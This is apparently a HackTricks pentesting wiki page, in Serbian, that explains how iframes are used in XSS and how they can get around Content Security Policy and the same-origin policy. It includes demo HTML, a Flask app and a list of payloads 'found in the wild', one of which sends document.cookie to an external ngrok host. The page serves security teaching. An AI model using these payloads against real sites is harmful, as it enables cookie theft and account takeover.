Iframes in XSS, CSP and SOP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Iframes in XSS

Postoje 3 načina da se označi sadržaj iframed stranice:

Putem src koji označava URL (URL može biti cross origin ili same origin)
Putem src koji označava sadržaj koristeći data: protokol
Putem srcdoc koji označava sadržaj

Pristupanje Parent & Child varijablama

<html>
<script>
var secret = "31337s3cr37t";
</script>

<iframe id="if1" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if2" src="child.html"></iframe>
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>

<script>
function access_children_vars(){
alert(if1.secret);
alert(if2.secret);
alert(if3.secret);
alert(if4.secret);
}
setTimeout(access_children_vars, 3000);
</script>
</html>

<!-- content of child.html -->
<script>
var secret="child secret";
alert(parent.secret)
</script>

Ako pristupite prethodnom html-u putem http servera (kao što je python3 -m http.server), primetićete da će se svi skripti izvršiti (pošto ne postoji CSP koji to sprečava). roditelj neće moći da pristupi secret varijabli unutar bilo kog iframe-a i samo iframe-ovi if2 i if3 (koji se smatraju istim mestom) mogu pristupiti tajni u originalnom prozoru. Obratite pažnju kako se if4 smatra da ima null poreklo.

Iframes sa CSP

Molimo vas, obratite pažnju kako u sledećim zaobilaženjima odgovor na iframed stranicu ne sadrži nijedan CSP header koji sprečava izvršavanje JS-a.

self vrednost script-src neće dozvoliti izvršavanje JS koda koristeći data: protokol ili srcdoc atribut. Međutim, čak i none vrednost CSP-a će dozvoliti izvršavanje iframe-ova koji stavljaju URL (potpun ili samo putanju) u src atribut. Stoga je moguće zaobići CSP stranice sa:

<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk='">
</head>
<script>
var secret = "31337s3cr37t";
</script>
<iframe id="if1" src="child.html"></iframe>
<iframe id="if2" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
</html>

Napomena kako prethodni CSP dozvoljava samo izvršavanje inline skripte. Međutim, samo if1 i if2 skripte će biti izvršene, ali samo if1 će moći da pristupi roditeljskom tajnom.

Stoga, moguće je obići CSP ako možete da otpremite JS datoteku na server i učitate je putem iframe-a čak i sa script-src 'none'. Ovo se potencijalno može uraditi i zloupotrebom same-site JSONP krajnje tačke.

Možete testirati ovo sa sledećim scenarijom gde je kolačić ukraden čak i sa script-src 'none'. Samo pokrenite aplikaciju i pristupite joj putem vašeg pregledača:

import flask
from flask import Flask
app = Flask(__name__)

@app.route("/")
def index():
resp = flask.Response('<html><iframe id="if1" src="cookie_s.html"></iframe></html>')
resp.headers['Content-Security-Policy'] = "script-src 'self'"
resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
return resp

@app.route("/cookie_s.html")
def cookie_s():
return "<script>alert(document.cookie)</script>"

if __name__ == "__main__":
app.run()

Ostali payloadi pronađeni u divljini

<!-- This one requires the data: scheme to be allowed -->
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
<!-- This one injects JS in a jsonp endppoint -->
<iframe srcdoc='<script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
<!-- sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)-->
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>

Iframe sandbox

Sadržaj unutar iframe-a može biti podvrgnut dodatnim ograničenjima korišćenjem sandbox atributa. Po defaultu, ovaj atribut nije primenjen, što znači da nema ograničenja.

Kada se koristi, sandbox atribut nameće nekoliko ograničenja:

Sadržaj se tretira kao da potiče iz jedinstvenog izvora.
Svaki pokušaj slanja formi je blokiran.
Izvršavanje skripti je zabranjeno.
Pristup određenim API-jima je onemogućen.
Sprečava interakciju linkova sa drugim kontekstima pretraživanja.
Korišćenje dodataka putem <embed>, <object>, <applet>, ili sličnih oznaka je zabranjeno.
Navigacija sadržajem najvišeg nivoa pretraživačkog konteksta od strane samog sadržaja je sprečena.
Funkcije koje se automatski aktiviraju, poput reprodukcije videa ili automatskog fokusiranja kontrola formi, su blokirane.

Vrednost atributa može biti ostavljena prazna (sandbox="") da bi se primenila sva prethodno navedena ograničenja. Alternativno, može se postaviti na listu specifičnih vrednosti odvojenih razmakom koje izuzimaju iframe od određenih ograničenja.

<iframe src="demo_iframe_sandbox.htm" sandbox></iframe>

Iframes u SOP

Proverite sledeće stranice:

Podrška HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousDOM XSS NextInteger Overflow

Last updated 4 months ago